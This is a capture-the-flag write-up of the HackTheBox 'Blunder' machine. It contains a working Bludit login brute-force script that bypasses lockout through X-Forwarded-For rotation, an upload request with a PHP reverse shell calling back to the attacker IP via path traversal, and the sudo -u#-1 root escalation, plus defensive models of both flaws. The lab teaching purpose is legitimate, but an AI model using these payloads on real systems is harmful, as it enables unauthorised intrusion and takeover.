
# Blunder 10.10.10.191

![Completed at 29 October 2020](/files/-MKiRiFbYYZVovdLcFgJ)

## **Background**

**Blunder** is a Linux machine from [HackTheBox](https://www.hackthebox.eu/home/machines/profile/255), a realistic box that requires a CVE-based exploit technique, for training your ethical hacking and penetration testing skills.

After basic enumeration, this Linux server turns out to host a web application built with the Bludit CMS running on port 80. Using the tool dirb, some hidden files are found which contain a possible user name "*fergus*", and a brute-force-protected admin login page is also identified.

After googling, I find that the brute-force protection of this version of Bludit CMS can be bypassed, and obtain the administrative account. I try to upload a PHP reverse shell to the site via the provided image upload function; the upload succeeds, but I fail to find the access path. Googling again, there is a CVE exploit on Bludit related to directory traversal. Following its instructions, I get low-privilege access.

Enumerating the system, a newer version of Bludit CMS is found together with its file-based user account database, which holds a SHA-1 hashed password for the user account hugo. Cracking the password with an online tool gives access to this user account.

Enumerating the system again with the tool linpeas, the installed sudo version has a privilege escalation vulnerability. Following the ExploitDB instructions, root access is finally obtained.

<130n@calvinlai.com>

**Target Machine**: 10.10.10.191

**Attacker Machine**: 10.10.14.16

## **Hacking Process Part 0 – Service Scanning** <a href="#hacking-process-part-0-service-scanning" id="hacking-process-part-0-service-scanning"></a>

### **Quick Pre-searching** <a href="#quick-pre-searching" id="quick-pre-searching"></a>

![nmap -p- -T5 --min-rate=1000 10.10.10.191 -oG fkclai.nmap](https://lh4.googleusercontent.com/Ov-wMHJcRP-8qlRpbhAZG454G9EQCOHE4ElKOKm3gawBGSl4BBYsgiuNkxGydBIQxsfBxvRVcjt2i8lOauDwtUBjigbs41qJdRyK75DGpKEOhxuO9n4WBhi5jxwhUefW_OJvLe5Y)

### **Details Analysis** <a href="#details-analysis" id="details-analysis"></a>

![nmap -p $(grep -Eo '\[0-9\]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.191 -o nmap-result.txt](https://lh4.googleusercontent.com/6XhSoo7kLoxb4GldxJSaQljDJvPrZCQWc7JWw6yyOdSYfOOsUobdMXvYMfgVOH9DtfTIiO_cK_q_ax5PfHyX8BSBfV-oM2aEW1SSIN7kXN45PIZBvCl6gVPzZq9LPjo7jQg0135b)

**Enumeration Strategy**

Only port 80 is open, so focus on the web application and check for any CVE vulnerabilities.

## **Hacking Process Part 1 – Enumeration**

![](https://lh3.googleusercontent.com/7GnLLBriR-O2qCCdDA8QEjejZvykVIROqB-umnjJTnvE16v_bnw8FrJ3w6O6CmJ2RY5x27orPwAwJLwZr2Acb1_MfUy4nQOu54ba5Up5IXwISfv7iZ0EAk0UH4uArPGZVzupVPHW)

### **1.1 Enumerating the website**

Using the following tools, a folder and two files are found: /admin/, /robots.txt, and /todo.txt

* `gobuster dir -u http://10.10.10.191 -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,php`
* `dirb http://10.10.10.191/ /usr/share/wordlists/dirb/common.txt -o dirb-191.result`
* `gobuster dir -u 'http://10.10.10.191/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-191.result`
* `python3 /root/Documents/ctf/tools/dirsearch/dirsearch.py -u http://10.10.10.191/ -e jsp,txt -x 301,302,403,404 --simple-report=dirsearch-191.result`

**/robots.txt**

![](/files/-MKp4fviHtRQocy8FkyO)

**/todo.txt**

![](https://lh6.googleusercontent.com/JUpZj16Ij5a-hga_c-_15v1vJA7IZIH3QxBbirFM-ZeS0B_pG43DzirDaVUbCvPOCeq3z0G38RpX7sPgA8wvMSxBgWO8gMviF4ShWVhxEAVxUazPH1h-41yOhhQWOeb3wWYkHLnx)

**/admin/**

![](https://lh3.googleusercontent.com/Imte9GWusZl_uzpuZKQGht98YJkmZvsfRk9CPYIP8mLKpy9eS4HJEivPpj2CRgxYCLqrLIkMedczgj7Tc8cX9OgMcIZzmZB3uX4JBabZCk-SnIbyQvNhJRi3E6uYqxJg2GoW6zBm)

The source code of the login portal shows that it is built with Bludit CMS version 3.9.2, and /todo.txt hints at a user `fergus`.

![](/files/-MKofYP5rWaUDR0YY4G8)

### 1.2 Get the website login

Brute forcing is not a simple task, as the site implements a CSRF token and after 10 login attempts my IP address is blocked. As the next step, I search for any vulnerability of this Bludit version and this [blog](https://rastating.github.io/bludit-brute-force-mitigation-bypass/) is found.

I fail to gain website login access using rockyou.txt as the password list, but succeed using [cewl](https://tools.kali.org/password-attacks/cewl) to gather a wordlist from the site itself.

```python
#!/usr/bin/env python3
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = []

# Load the candidate passwords, one per line
with open('password.txt', 'r') as pwd:
    for line in pwd:
        wordlist.append(line.rstrip())

# Add the correct password to the end of the list
wordlist.append('adminadmin')

for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    # Every attempt needs a fresh CSRF token taken from the login form
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
    print('[*] Trying: {p}'.format(p = password))
    headers = {
        # The IP-ban counter keys on this header, so a new value per attempt avoids the lockout
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    # A redirect to the dashboard means the credentials were accepted
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break
```

```bash
root@kclai:~/Documents/ctf/htb/linux/17-HTB-Blunder/exploit# cewl 10.10.10.191 > password.txt

root@kclai:~/Documents/ctf/htb/linux/17-HTB-Blunder/exploit# python3 exploit.py 
[*] Trying: CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
[*] Trying: the
[*] Trying: Load
[*] Trying: Plugins
[*] Trying: and
.......
.....
....
...
[*] Trying: Letters
[*] Trying: probably
[*] Trying: best
[*] Trying: fictional
[*] Trying: character
[*] Trying: RolandDeschain

SUCCESS: Password found!
Use fergus:RolandDeschain to login.

```
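The defender's side of the bypass above, as an added example that is not code from this page or from Bludit: a login limiter keyed on the flawed `X-Forwarded-For` value beside one that only honours that header from a trusted proxy, replayed against the same rotating-header loop. The trusted proxy range, the attacker address and the wordlist are constructed.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network

MAX_ATTEMPTS = 10  # lockout threshold observed on the site: ten failed logins
# Constructed: only a reverse proxy in this range may set X-Forwarded-For for us
TRUSTED_PROXIES = [ip_network("10.0.0.0/8")]


def client_ip_vulnerable(remote_addr, headers):
    """Flawed key: any X-Forwarded-For value replaces the socket address,
    so the client chooses the 'IP' that the failure counter sees."""
    return headers.get("X-Forwarded-For", remote_addr)


def client_ip_hardened(remote_addr, headers, trusted=TRUSTED_PROXIES):
    """Honour X-Forwarded-For only when the direct peer is a trusted proxy and the
    value is a real address; otherwise the socket address is the key."""
    if not any(ip_address(remote_addr) in net for net in trusted):
        return remote_addr
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):  # the last hop is the one our own proxy appended
        try:
            return str(ip_address(hop))
        except ValueError:
            continue
    return remote_addr


class LoginLimiter:
    """Per-key failure counter; 'blocked' once a key reaches MAX_ATTEMPTS failures."""

    def __init__(self, key_func):
        self.key_func = key_func
        self.failures = defaultdict(int)

    def attempt(self, remote_addr, headers, password_ok):
        key = self.key_func(remote_addr, headers)
        if self.failures[key] >= MAX_ATTEMPTS:
            return "blocked"
        if password_ok:
            self.failures[key] = 0
            return "ok"
        self.failures[key] += 1
        return "denied"


def run_wordlist(limiter, words, correct, attacker_addr="203.0.113.7"):
    """Replay the loop above: one request per word, X-Forwarded-For set to the word.
    Returns ('ok', word) when the login lands, ('blocked', word) when the limiter holds."""
    for word in words:
        outcome = limiter.attempt(attacker_addr, {"X-Forwarded-For": word}, word == correct)
        if outcome != "denied":
            return outcome, word
    return "denied", None


# Constructed wordlist: twelve distinct guesses with the right one last
WORDS = [f"guess{i}" for i in range(11)] + ["RolandDeschain"]
```

Against the vulnerable key every guess gets a fresh counter and the last word logs in; against the hardened key the single socket address is locked out after the tenth failure.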

## Hacking Process Part 2 - Initial low privilege access

Enumerating the system after getting the login access, there is an image upload function. A PHP reverse shell file and a `.htaccess` file can bypass the client-side validation and are uploaded to the server successfully, but the file access path cannot be found.

![](https://lh5.googleusercontent.com/Zz27cUBl7RHD6LoTMnT5qBFyHNWFVIgjJQS5JBn2hw77TemBACsIjxC_FZpVnLlEiyRK6zOB711cPuJbclCkhD4sN72bI2bc7snXq_jcyXhvGWTxJcoiADzLrapZAeAaeL78duqR)

After searching the exploit database, there is a CVE vulnerability in Bludit 3.9.2 related to directory traversal. The PoC script shows that the UUID parameter can be used to control the resulting access path.

![](https://lh6.googleusercontent.com/BZ10XjFQnSPuIVyovLRQUuS4drTkiJM5CpKbpod0M4nyWsRF4bvdHtx8Ib_awwOz4AbWfujJMkjFUv5A6mAhDDWcTh8nPzJ1kTK75b7ktZt7Zs3Z5igDOFAhHci6u_DMKQmWXPpZ)

### 2.1 Get the www account access

As the upload validation only applies on the client side, I use Burp to change the upload parameters (the `filename` value and the `uuid`), so the PHP reverse shell and the `.htaccess` file are uploaded to the `/tmp/` folder. I can then execute the PHP reverse shell by visiting <http://10.10.10.191/bl-content/tmp/reverse.php>

```http
POST /admin/ajax/upload-images HTTP/1.1
Host: 10.10.10.191
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.191/admin/new-content
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------1577569979961725874602175024
Content-Length: 11616
Connection: close
Cookie: BLUDIT-KEY=ngp0psekevm7je3hnrlhjmkj57

-----------------------------1577569979961725874602175024
Content-Disposition: form-data; name="images[]"; filename="reverse.png"
Content-Type: image/png
.....
.....
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
.....
.....
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.16';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/bash -i';
....
...
..
-----------------------------1577569979961725874602175024
Content-Disposition: form-data; name="uuid"

../../tmp
-----------------------------1577569979961725874602175024
Content-Disposition: form-data; name="tokenCSRF"

60f8752883482353d1ad20bbff841b4aa9668c71
-----------------------------1577569979961725874602175024--
```

```apache
# .htaccess file
RewriteEngine off
AddType application/x-httpd-php .png
```

Finally, the initial web server account privilege access is obtained.

![](https://lh6.googleusercontent.com/Xn4OQUc3QVHxriJOJGua7e0ApDF2lhdAILO2w1-KC0Z1i9tDhM92guyxIk6A9dtvhnjZPLGHSKw7QsZoEQKh0Vbr3ct0fWZm_sD-IlINkcAJNzLcQaFfUT8dn4jNynTNSTBtoB9q)

### 2.2 Get the user account access

The system files show that this Bludit CMS is set up to use a file-based database; three hashed passwords are found in users.php across the two Bludit folders. According to the official [password recovery tool](https://raw.githubusercontent.com/bludit/password-recovery-tool/master/recovery.php), these hashes are in SHA-1 format. Using the [online tool](https://md5decrypt.net/en/Sha1/) to look up the hashed password, the password for the hugo account is obtained: **Password120**.

![](https://lh4.googleusercontent.com/Hb7n2c5yXTZjJqEeiPbtM279jBozeequgHOTK5mNJG3hZtSB-rRKvLhfEUS0RcymJYvQz52pVgixeBwbMOF_8ajNUzD-xMoIzsx__NXKP9J_0ifvunJ2SKyTHE-s3JyByXqxgrIX)

I find that Hugo reuses this password on his system account. Let's spawn a PTY shell, as this will allow us to use the su command. The low-privilege user account is obtained.

```bash
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ python -c "import pty;pty.spawn('/bin/bash');"
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ su hugo
su hugo
Password: Password120
```

![](https://lh4.googleusercontent.com/smtJFmQkXrl05QdstS20vfV5A76NQp7BIPSnBMkhKmoVL2fkJaD3I-zSyH4e3cCy7HaBPipe1dxde-MkFfDrEP-GdEr1NtYBVIagZU2bRiUXQYvsilR0kin9yd58QYwuqRXiTx-1)

## Hacking Process Part 3 - Privilege Escalation

Download [linpeas.sh](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) to study the environment and search for possible paths to escalate privileges on Linux hosts. The result shows that the sudo version of this system is one possible path to escalate privilege.

![](https://lh3.googleusercontent.com/5eL7IxwXEE09bHA_0H8VeqveV40RUswlRqOsPkaXLeUN3eJPq11NM8YebL4Q5oqE5dqNAsE0Ih4tuixpYriWvUo5UfKFBJs5pdd-pts595wODQ6lkLqa0rAyRNjMHKqcfdIA9xb7)

![](https://lh5.googleusercontent.com/n0cUZqBoHAn6HtzipFPvQbMPfOIr_a1ouj8ONaMVxySpIPom31Dewr3rtn3kPAyz1-Dk4s9I29DFBIGFvmMqbOYQnhrrGgiSkktv5wCyi7_awum6-U4W0eZVFT0p9Od3bH6VDr4G)

Searching exploit-db again, a [CVE exploit](https://www.exploit-db.com/exploits/47502) for this sudo version is identified. Following its instructions, root privilege is obtained.

![](https://lh6.googleusercontent.com/Ef69nDfJe7Z7TYLQlbANPQISyJY9ZxOAjIZwPF0Y4kPdil2CkiAf6VZYhOi6GQPMVwgi0urBlcB6AFWy9OOPm0uGml_684kYxwDg4FZ2a32be4X0h9fydG-Cu13bh1ZuAnhq2w7W)

```bash
hugo@blunder:~$ 
hugo@blunder:~$ sudo -l
sudo -l
Password: Password120

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
hugo@blunder:~$ sudo --version
sudo --version
Sudo version 1.8.25p1
Sudoers policy plugin version 1.8.25p1
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.25p1
hugo@blunder:~$ 
hugo@blunder:/$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
Password: Password120

root@blunder:/
```

![](https://lh3.googleusercontent.com/2B8xs4Ms2o39mrWze6pGaftu8yHVCv81_ksrvhhiuSLXPQNc3kL1AS_3A5jHu_ZqJeokh_yE_B8pRynfgxT9BiZ0qUm0c3HR-B_movvF_knVzQKfaUwb6vpdFMI1FlyxhpB0yglW)
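To show why the `(ALL, !root)` rule above does not hold on sudo 1.8.25p1, here is an added example (not code from this page, ExploitDB or the sudo project) that models the Runas check followed by the uid switch, and an audit helper that flags sudoers lines relying on `!` exclusion. It assumes that 1.8.28 is the release in which sudo started rejecting the ids -1 and 4294967295, and the sudoers fragment is constructed.

```python
import re

UID_ROOT = 0
UID_MAX = 2**32 - 1  # 4294967295: the unsigned 32-bit image of -1


def parse_version(text):
    """'1.8.25p1' -> (1, 8, 25, 1); the 'p' patch level becomes a fourth component."""
    return tuple(int(x) for x in re.findall(r"\d+", text))


def runas_permitted(requested_uid, sudo_version):
    """Model of the '(ALL, !root)' Runas check: 'ALL' matches any uid and '!root'
    excludes only uid 0. From 1.8.28 on (assumed cutoff) -1 and 4294967295 are
    refused as invalid ids before the match is even attempted."""
    if parse_version(sudo_version) >= (1, 8, 28) and requested_uid in (-1, UID_MAX):
        return False
    return requested_uid != UID_ROOT


def effective_uid(current_uid, requested_uid):
    """setresuid() semantics: -1 (or its 32-bit twin 4294967295) means 'leave unchanged'."""
    return current_uid if requested_uid in (-1, UID_MAX) else requested_uid


def simulate_sudo(runas_arg, sudo_version):
    """Run a numeric '-u#<uid>' argument through policy and then the uid switch.
    sudo itself is root before switching, so an unchanged uid is 0.
    Returns the uid the command would run as, or None when policy refuses."""
    match = re.fullmatch(r"#(-?\d+)", runas_arg)
    if not match:
        raise ValueError("only numeric '#uid' arguments are modelled")
    uid = int(match.group(1))
    if not runas_permitted(uid, sudo_version):
        return None
    return effective_uid(UID_ROOT, uid)


def find_negated_runas(sudoers_text):
    """Audit: return sudoers lines whose Runas list relies on '!' exclusion."""
    pattern = re.compile(r"\([^)]*!\s*\w+[^)]*\)")
    return [ln.strip() for ln in sudoers_text.splitlines() if pattern.search(ln)]


# Constructed sudoers fragment mirroring the rule shown by `sudo -l` above
SAMPLE_SUDOERS = """\
Defaults env_reset, mail_badpass
hugo ALL=(ALL, !root) /bin/bash
deploy ALL=(www-data) NOPASSWD: /usr/bin/systemctl restart app
"""
```

The model reproduces the outcome seen in the session: on 1.8.25p1 the `#-1` request passes the `!root` check yet leaves the process at uid 0, while on a patched version it is refused outright; the audit list is what a review of `/etc/sudoers` should turn up before relying on a negated Runas entry.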

## **Recommendation**

Missing patches are very common in real-life systems; we need to keep system patches up to date to avoid known attacks.

## **Reference Link**

[**https://rastating.github.io/bludit-brute-force-mitigation-bypass/**](https://rastating.github.io/bludit-brute-force-mitigation-bypass/)\
[**https://raw.githubusercontent.com/bludit/password-recovery-tool/master/recovery.php**](https://raw.githubusercontent.com/bludit/password-recovery-tool/master/recovery.php)\
[**https://md5decrypt.net/en/Sha1/**](https://md5decrypt.net/en/Sha1/)\
[**https://www.exploit-db.com/exploits/47502**](https://www.exploit-db.com/exploits/47502)
